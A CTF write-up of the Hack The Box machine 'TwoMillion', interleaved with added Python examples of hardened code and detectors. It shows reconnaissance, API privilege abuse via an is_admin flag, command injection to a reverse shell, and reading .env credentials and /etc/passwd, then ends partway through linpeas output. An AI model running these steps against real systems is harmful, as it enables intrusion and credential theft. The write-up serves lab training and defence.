
【Hack The Box】TwoMillion【WriteUp】


Introduction

Hi there, I'm a self-styled engineer who is honestly pretty bad at this.
This article is my write-up of the Hack The Box machine "TwoMillion" (see the link below).
Note: as with my earlier posts, this does not go into detail on how each tool is used.

Note: please do not misuse any of this. Use these techniques only to contribute to society; anything else will get you in trouble with the law.

Discovery

Port scan

This time I tried a fast scan with RustScan.

┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.221 --top --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.221:22
Open 10.10.11.221:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-08 01:56 EDT
Initiating Ping Scan at 01:56
Scanning 10.10.11.221 [4 ports]
Completed Ping Scan at 01:56, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:56
Completed Parallel DNS resolution of 1 host. at 01:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:56
Scanning 10.10.11.221 [2 ports]
Discovered open port 80/tcp on 10.10.11.221
Discovered open port 22/tcp on 10.10.11.221
Completed SYN Stealth Scan at 01:56, 0.22s elapsed (2 total ports)
Nmap scan report for 10.10.11.221
Host is up, received reset ttl 63 (0.19s latency).
Scanned at 2023-06-08 01:56:28 EDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (128B)

Ports 22 and 80 appear to be open.
When I actually browse to port 80, the browser says it cannot reach "2million.htb", so I need to set up name resolution.

Collection - 1

Domain configuration

There is no DNS server in this box's environment, so I make the name resolvable on my own Kali Linux.
I do that by editing /etc/hosts.

┌──(root💀kali)-[~/work]
└─# vim /etc/hosts   

Add the following line.

10.10.11.221    2million.htb

Check connectivity.

┌──(root㉿kali)-[~]
└─# ping 2million.htb
PING 2million.htb (10.10.11.221) 56(84) bytes of data.
64 bytes from 2million.htb (10.10.11.221): icmp_seq=1 ttl=63 time=188 ms
64 bytes from 2million.htb (10.10.11.221): icmp_seq=2 ttl=63 time=185 ms
64 bytes from 2million.htb (10.10.11.221): icmp_seq=3 ttl=63 time=185 ms
^C
--- 2million.htb ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 184.595/185.965/187.920/1.418 ms

Site enumeration

Subdomain enumeration

Download a subdomain wordlist from the following site.

┌──(root💀kali)-[~/work]
└─# wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/bitquark-subdomains-top100000.txt

Enumerate with ffuf.

┌──(root㉿kali)-[~/work]
└─# ffuf -w ./bitquark-subdomains-top100000.txt:FUZZ -u http://2million.htb/ -H "HOST: FUZZ.2million.htb" -fs 162 -mc all -t 150

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://2million.htb/
 :: Wordlist         : FUZZ: /root/work/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.2million.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: all
 :: Filter           : Response size: 162
________________________________________________

:: Progress: [100000/100000] :: Job [1/1] :: 772 req/sec :: Duration: [0:02:14] :: Errors: 0 ::

Nothing in particular.

Directory enumeration

Enumerate with dirsearch.

┌──(root㉿kali)-[~/work]
└─# dirsearch -u http://2million.htb/ 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                                                     
                                                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/2million.htb/-_23-06-08_02-10-55.txt

Error Log: /root/.dirsearch/logs/errors-23-06-08_02-10-55.log

Target: http://2million.htb/

[02:10:56] Starting: 
[02:10:58] 301 -  162B  - /js  ->  http://2million.htb/js/                 
[02:11:11] 200 -    2KB - /404                                              
[02:11:37] 401 -    0B  - /api                                              
[02:11:37] 401 -    0B  - /api/v1                                           
[02:11:38] 301 -  162B  - /assets  ->  http://2million.htb/assets/          
[02:11:38] 403 -  548B  - /assets/
[02:11:47] 403 -  548B  - /controllers/                                     
[02:11:48] 301 -  162B  - /css  ->  http://2million.htb/css/                
[02:11:56] 301 -  162B  - /fonts  ->  http://2million.htb/fonts/            
[02:11:59] 302 -    0B  - /home  ->  /                                      
[02:12:00] 301 -  162B  - /images  ->  http://2million.htb/images/          
[02:12:00] 403 -  548B  - /images/
[02:12:03] 403 -  548B  - /js/                                              
[02:12:06] 200 -    4KB - /login                                            
[02:12:07] 302 -    0B  - /logout  ->  /                                    
[02:12:21] 200 -    4KB - /register                                         
[02:12:36] 301 -  162B  - /views  ->  http://2million.htb/views/ 

Double-check with ffuf as well.

┌──(root㉿kali)-[~/work]
└─# ffuf -w ./directory-list-2.3-small.txt:FUZZ -u http://2million.htb/FUZZ -t 150 -fs 162

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://2million.htb/FUZZ
 :: Wordlist         : FUZZ: /root/work/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 162
________________________________________________

[Status: 200, Size: 3704, Words: 1365, Lines: 81, Duration: 229ms]
    * FUZZ: login

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 258ms]
    * FUZZ: home

[Status: 200, Size: 4527, Words: 1512, Lines: 95, Duration: 285ms]
    * FUZZ: register

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 197ms]
    * FUZZ: #

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 206ms]
    * FUZZ: # directory-list-2.3-small.txt

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 214ms]
    * FUZZ: # or send a letter to Creative Commons, 171 Second Street,

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 258ms]
    * FUZZ: #

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 268ms]
    * FUZZ: # on at least 3 different hosts

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 268ms]
    * FUZZ: # Priority-ordered case-sensitive list, where entries were found

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 260ms]
    * FUZZ: # Suite 300, San Francisco, California, 94105, USA.

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 273ms]
    * FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 270ms]
    * FUZZ: #

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 268ms]
    * FUZZ: 

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 199ms]
    * FUZZ: # Copyright 2007 James Fisher

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 196ms]
    * FUZZ: #

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 200ms]
    * FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 202ms]
    * FUZZ: # This work is licensed under the Creative Commons

[Status: 401, Size: 0, Words: 1, Lines: 1, Duration: 203ms]
    * FUZZ: api

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 206ms]
    * FUZZ: logout

[Status: 200, Size: 1674, Words: 118, Lines: 46, Duration: 227ms]
    * FUZZ: 404

[Status: 200, Size: 1674, Words: 118, Lines: 46, Duration: 347ms]
    * FUZZ: 0404

[Status: 200, Size: 3859, Words: 1363, Lines: 97, Duration: 395ms]
    * FUZZ: invite

[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 445ms]
    * FUZZ: 

:: Progress: [87664/87664] :: Job [1/1] :: 339 req/sec :: Duration: [0:04:20] :: Errors: 0 ::

Let's browse to the /invite path.
(screenshot: 1.png)
Oh, it looks like you can POST here, so let's throw a payload at it.

Initial Access - 1

sqlmap

It behaves as if it looks the invite code up in a database, so let's try sqlmap.
First, save the following request as a file named "req".
POST /api/v1/invite/verify HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Origin: http://2million.htb
Connection: close
Referer: http://2million.htb/invite
Cookie: PHPSESSID=0t5v42tcp6fbo88jss9a5pu1ru

code=1

OK! Run sqlmap.

┌──(root㉿kali)-[~/work]
└─# sqlmap -r req --dump --batch --level 5 --risk 3
        ___
       __H__                                                                                                                                                
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:37:57 /2023-06-08/

[02:37:57] [INFO] parsing HTTP request from 'req'
[02:37:57] [INFO] testing connection to the target URL
[02:37:57] [INFO] testing if the target URL content is stable
[02:37:58] [INFO] target URL content is stable
[02:37:58] [INFO] testing if POST parameter 'code' is dynamic
[02:37:58] [WARNING] POST parameter 'code' does not appear to be dynamic
[02:37:58] [WARNING] heuristic (basic) test shows that POST parameter 'code' might not be injectable
[02:37:58] [INFO] testing for SQL injection on POST parameter 'code'
[02:37:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[02:38:33] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[02:38:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:38:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:39:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:39:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[02:39:18] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[02:39:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:39:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:39:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[02:39:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:39:48] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:39:58] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'

...(omitted)

Nothing useful came out of it.
Looks like I need to find another route.

Collection - 2

invite

Poking around the site, I found an interesting JS file: inviteapi.min.js.
(screenshot: 2.png)
It was minified/obfuscated, so I ran it through the following site to make it readable.

(screenshot: 3.png)
Let's access the path written in it.
(screenshot: 4.png)
The data field appears to be ROT13-encoded, so I decode it with the following site.

(screenshot: 5.png)

Oh, so sending a POST to /api/v1/invite/generate hands out a code. Let's send one.
(screenshot: 6.png)
Got a response! The code looks Base64-encoded, so decode it.
(screenshot: 7.png)
Enter the decoded code on the /invite page.
(screenshot: 8.png)
That redirected me to /register, so I can create a user. I create a user named test and log in.
(screenshot: 9.png)
Done.
At first glance there is nothing to find, so more investigation is needed.
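The invite flow above stacks two reversible encodings (ROT13 in the JS hint, Base64 in the returned code), neither of which provides any secrecy. The following is an added Python example, not code from the write-up or the box, that walks both decode steps on constructed sample values; the ROT13 hint text and the Base64 code below are made up for illustration and are not the strings from the machine.

```python
import base64
import binascii
import codecs


def decode_rot13_hint(text: str) -> str:
    """ROT13 is a fixed substitution: applying it once decodes as well as encodes."""
    return codecs.decode(text, "rot13")


def decode_invite_code(code: str) -> str:
    """Decode a Base64 invite code, failing loudly on malformed input."""
    try:
        raw = base64.b64decode(code, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"not valid Base64: {code!r}") from exc
    return raw.decode("ascii")


# Constructed sample data (not the values from the box): a ROT13 hint of the
# kind found in the JS file, and a Base64-encoded invite code.
SAMPLE_HINT_ROT13 = "Znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr"
SAMPLE_CODE_B64 = "SFRCLUlOVklURQ=="


def recover_invite_flow(hint_rot13: str, code_b64: str) -> dict:
    """Walk both decode layers and report what each one reveals."""
    hint = decode_rot13_hint(hint_rot13)
    # Pull the API path out of the decoded hint, if there is one.
    endpoint = next((w for w in hint.split() if w.startswith("/api/")), None)
    return {"hint": hint, "endpoint": endpoint, "code": decode_invite_code(code_b64)}


if __name__ == "__main__":
    print(recover_invite_flow(SAMPLE_HINT_ROT13, SAMPLE_CODE_B64))
```

The takeaway for the application side is that an "obfuscated" client-side hint and an encoded invite code are readable by anyone who fetches the JS; gating registration needs a server-side check, not an encoding.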

api

Poking around some more, I found a list of API endpoints at the following path.
(screenshot: 10.png)
Let's access /api/v1/user/auth.
(screenshot: 11.png)
Ah, so this is_admin flag is what grants access to the admin endpoints.

admin

Let's try creating a new user with this flag set in the request.
(screenshot: 12.png)
(screenshot: 13.png)
Login succeeded! Let's check whether the is_admin flag got set.
(screenshot: 14.png)
No luck. Then maybe the /api/v1/admin/settings/update endpoint will do it.
Let's send a PUT.
(screenshot: 15.png)
It complains that the content-type is wrong, so send it as JSON.
(screenshot: 16.png)
Got a proper response this time. The is_admin flag appears to be set.
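The is_admin issue above is a textbook combination of mass assignment (a client-supplied privilege field copied into the user model) and a missing authorization check on the admin settings endpoint. As an added example, not code from the write-up or from the box's PHP application, the Python below shows the vulnerable handler pattern next to a hardened one; the in-memory user store, field names and the Forbidden exception are assumptions for illustration.

```python
from dataclasses import dataclass


@dataclass
class User:
    username: str
    email: str = ""
    is_admin: bool = False


# Constructed in-memory store standing in for the application's database.
USERS: dict[str, User] = {}

# Fields a client is allowed to set on registration. Privilege flags are not on it.
CLIENT_SETTABLE = {"username", "email"}


class Forbidden(Exception):
    """Raised when the caller lacks the role an endpoint requires."""


def register_vulnerable(payload: dict) -> User:
    """Copies every client-supplied field into the model, is_admin included."""
    user = User(username=payload["username"], email=payload.get("email", ""),
                is_admin=bool(payload.get("is_admin", False)))
    USERS[user.username] = user
    return user


def register_hardened(payload: dict) -> tuple[User, set[str]]:
    """Only allowlisted fields are honoured; the server decides is_admin.

    Returns the user and the set of ignored fields so the caller can log
    attempts to set privileged attributes."""
    ignored = set(payload) - CLIENT_SETTABLE
    user = User(username=payload["username"], email=payload.get("email", ""),
                is_admin=False)
    USERS[user.username] = user
    return user, ignored


def update_settings_vulnerable(caller: User, payload: dict) -> User:
    """Any authenticated caller may flip is_admin on any user."""
    target = USERS[payload["username"]]
    target.is_admin = bool(payload.get("is_admin", target.is_admin))
    return target


def update_settings_hardened(caller: User, payload: dict) -> User:
    """Authorize on the caller's server-side role, never on request content."""
    if not caller.is_admin:
        raise Forbidden("admin role required")
    target = USERS[payload["username"]]
    target.is_admin = bool(payload.get("is_admin", target.is_admin))
    return target
```

The hardened registration deliberately reports the ignored fields rather than silently dropping them: a request that tries to set is_admin is a useful detection signal for the application's logs.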

Initial Access - 2

admin - vpn

Let's access the /api/v1/admin/vpn/generate endpoint. It's a POST anyway, so the vulnerability has to be here!
(screenshot: 17.png)
It complains that the content-type is wrong, so send it as JSON.
(screenshot: 18.png)
It says username is missing, so add one.
(screenshot: 19.png)
Let's test whether a payload can be injected here.

Reverse shell

Check with tcpdump whether a ping comes back.
(screenshot: 20.png)
It came back. OS command injection looks possible.
Using my go-to site below, I build a reverse shell command.

(screenshot: 21.png)
Set up a listener to catch the reverse shell.

┌──(root💀kali)-[~/work]
└─# nc -lnvp 4444           
listening on [any] 4444 ...

Fire the reverse shell!!
(screenshot: 22.png)
Got a shell!!!

Persistence

Check for any useful information.
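The command injection confirmed above comes from a username being concatenated into a shell command line. As an added example, not the box's code, the Python below contrasts that pattern with a hardened version that validates the username and passes it as a discrete argv element, and adds a small detector that reports the shell metacharacters in a rejected value so the attempt can be logged. The VPN script path is a placeholder; the write-up does not show the real script name.

```python
import re

# Placeholder path for the generator script (hypothetical; not from the write-up).
VPN_SCRIPT = "/var/www/html/VPN/gen.sh"

# Allowlist: letters, digits, underscore, dot and dash, 1-32 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Characters that change the meaning of a command line under a POSIX shell.
SHELL_METACHARS = set(";|&$`<>(){}\n\\'\"")


def build_command_vulnerable(username: str) -> str:
    """String-concatenated command destined for a shell: the injectable pattern."""
    return f"/bin/bash {VPN_SCRIPT} {username}"


def build_command_hardened(username: str) -> list[str]:
    """Validate the input, then pass it as one argv element (never via a shell).

    The returned list is what to hand to subprocess.run(argv, shell=False)."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"invalid username: {username!r}")
    return ["/bin/bash", VPN_SCRIPT, username]


def find_shell_metachars(value: str) -> set[str]:
    """Shell metacharacters present in a value; useful for logging rejected input."""
    return {c for c in value if c in SHELL_METACHARS}


if __name__ == "__main__":
    for name in ("alice_01", "alice;ls"):
        try:
            print("ok  ", build_command_hardened(name))
        except ValueError as exc:
            print("deny", exc, "metachars:", sorted(find_shell_metachars(name)))
```

Even with argv separation, the validation stays: the downstream script may itself interpolate its arguments, so the allowlist is the control, and argv separation is defence in depth.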

www-data@2million:~/html$ ls -lta
ls -lta
total 56
drwxr-xr-x  5 root root 4096 Jun  8 12:20 VPN
drwxr-xr-x 10 root root 4096 Jun  8 12:20 .
drwxr-xr-x  2 root root 4096 Jun  6 10:22 views
drwxr-xr-x  2 root root 4096 Jun  6 10:22 controllers
drwxr-xr-x  3 root root 4096 Jun  6 10:22 js
drwxr-xr-x  3 root root 4096 Jun  6 10:22 ..
drwxr-xr-x  2 root root 4096 Jun  6 10:22 fonts
drwxr-xr-x  2 root root 4096 Jun  6 10:22 images
drwxr-xr-x  5 root root 4096 Jun  6 10:22 css
drwxr-xr-x  2 root root 4096 Jun  6 10:22 assets
-rw-r--r--  1 root root 2692 Jun  2 18:57 index.php
-rw-r--r--  1 root root   87 Jun  2 18:56 .env
-rw-r--r--  1 root root 2787 Jun  2 16:15 Router.php
-rw-r--r--  1 root root 1237 Jun  2 16:15 Database.php
www-data@2million:~/html$ cat .env
cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123
www-data@2million:~/html$ 

Found a password, so let's try whether it also works over SSH. First check /etc/passwd to see which users exist.
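The .env file above is readable by the web server user and holds a database password that, as the next step shows, is reused for an interactive account. The following Python is an added example, not part of the write-up, of a small audit that walks a web root for .env files, reports which ones contain secret-looking keys, and flags those readable by group or others. The demo builds its own constructed web root in a temporary directory; the file contents are made up and are not the box's values.

```python
import re
import stat
import tempfile
from pathlib import Path

# Keys whose values should never be world-readable (captures the key name).
SECRET_KEY_RE = re.compile(r"^([A-Z0-9_]*(?:PASSWORD|SECRET|TOKEN|KEY))=", re.M)


def find_exposed_env_files(root: Path) -> list[dict]:
    """Return .env files under root that contain secret-looking keys.

    Each finding records the key names and whether the file mode grants
    read access to group or others (the web server user often falls there)."""
    findings = []
    for path in sorted(root.rglob(".env")):
        mode = path.stat().st_mode
        keys = SECRET_KEY_RE.findall(path.read_text(errors="replace"))
        if not keys:
            continue
        findings.append({
            "path": str(path),
            "keys": keys,
            "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
        })
    return findings


def demo() -> list[dict]:
    """Scan a constructed web root (sample data, not the box's files)."""
    root = Path(tempfile.mkdtemp())
    exposed = root / "html" / ".env"
    exposed.parent.mkdir(parents=True)
    exposed.write_text(
        "DB_HOST=127.0.0.1\nDB_DATABASE=app\nDB_USERNAME=app\nDB_PASSWORD=example-only\n"
    )
    exposed.chmod(0o644)  # readable by everyone on the host
    locked = root / "private" / ".env"
    locked.parent.mkdir(parents=True)
    locked.write_text("API_TOKEN=example-only\n")
    locked.chmod(0o600)  # owner only
    return find_exposed_env_files(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host the same scan would be run against the actual web root, and any finding with readable_by_others set is a candidate for a mode change and a credential rotation, since a password disclosed to the web user is also a password to test against every local account that shares it.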

www-data@2million:~/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
admin:x:1000:1000::/home/admin:/bin/bash
memcache:x:115:121:Memcached,,,:/nonexistent:/bin/false
_laurel:x:998:998::/var/log/laurel:/bin/false

Let's SSH!!
(screenshot: 23.png)
It worked.

Privilege Escalation

Investigation

sudo -l

First, use sudo -l to look for files or commands that can be run with elevated privileges.

admin@2million:~$ sudo -l
[sudo] password for admin: 
Sorry, user admin may not run sudo on localhost.

Nothing at all...

linpeas

So I'll use linpeas. I prefer it to LinEnum.
Download linpeas.sh from the following site.

admin@2million:/tmp$ chmod +x linpeas.sh 
admin@2million:/tmp$ ./linpeas.sh 


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------| 
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @hacktricks_live                          |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.'

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                    
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

...(omitted)
╔══════════╣ Files inside others home (limit 20)
/var/www/html/assets/particlesinline.json                                                                                                                   
/var/www/html/assets/particles.json
/var/www/html/css/pe-icons/Pe-icon-7-stroke.svg
/var/www/html/css/pe-icons/Pe-icon-7-stroke.ttf
/var/www/html/css/pe-icons/Pe-icon-7-stroke.woff
/var/www/html/css/pe-icons/pe-icon-7-stroke.css
/var/www/html/css/pe-icons/Pe-icon-7-stroke.eot
/var/www/html/css/pe-icons/helper.css
/var/www/html/css/style.css
/var/www/html/css/flags/flags.png
/var/www/html/css/flags/flags.min.css
/var/www/html/css/frontpage.css
